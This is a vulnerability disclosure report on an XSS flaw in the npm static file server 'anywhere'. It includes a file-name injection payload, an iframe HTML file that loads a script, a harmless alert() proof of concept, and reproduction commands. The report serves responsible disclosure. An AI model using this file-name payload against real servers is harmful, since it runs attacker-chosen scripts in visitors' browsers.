Node.js third-party modules: [anywhere] An iframe element with url to malicious HTML file (with eg. JavaScript malware) can be used as filename and served via anywhere

Hi Guys,

anywhere allows to embed HTML in file names, which (in certain conditions) might lead to execute malicious JavaScript.

Module:

Running static file server anywhere.

https://www.npmjs.com/package/anywhere

Description

To embed malicious <script> tag with JavaScript code to execute, / character is necessary.
In all operating systems, / is not allowed as a character used in file name. This means there is very few option to craft an attack using file name as injection point.

Steps To Reproduce:

However, if attacker wants to, one can still use some tricks and change one of the filenames into something like following example:

"><iframe src="malware_frame.html">

Then, HTML file with following content have to be saved in the same directory as file with the name changed:

<html>

<head>
    <meta charset="utf8" />
    <title>Frame embeded with malware :P</title>
</head>

<body>
    <p>iframe element with malicious code</p>
    &lt;script type="text/javascript" src="malware.js"&gt;&lt;/script&gt;
&lt;/body&gt;

&lt;/html&gt;

An src attribute value I’ve used here is just for PoC purpose, this can be any external url.
On my local machine, malware.js has following content:

alert('Uh oh, I am very bad malware!')

Now, if you run anywhere in directory where both file with filename changed and malware_frame.html are saved:

$ ./node_modules/anywhere/bin/anywhere -p 8080
Running at http://192.168.1.1:8080/
Also running at https://192.168.1.1:8081/

and open http://127.0.0.1:8080 in the browser, you can see JavaScript from malware.js is executed:

{F257400}

Supporting Material/References:

Configuration I’ve used to find this vulnerability:

• macOS HighSierra 10.13.3
• node 8.9.3
• npm 5.5.1
• curl 7.54.0

Wrap up

I hope this report will help to keep Node ecosystem more safe. If you have any questions about any details of this finding, please let me know in comment.

Thank you

Regards,

Rafal ‘bl4de’ Janicki

Impact

Exploitation of this vulnerability in the wild might be hard, however it’s not impossible and it depends only on attacker’s skills to get into directory on the server, where anywhere is used to serve static content.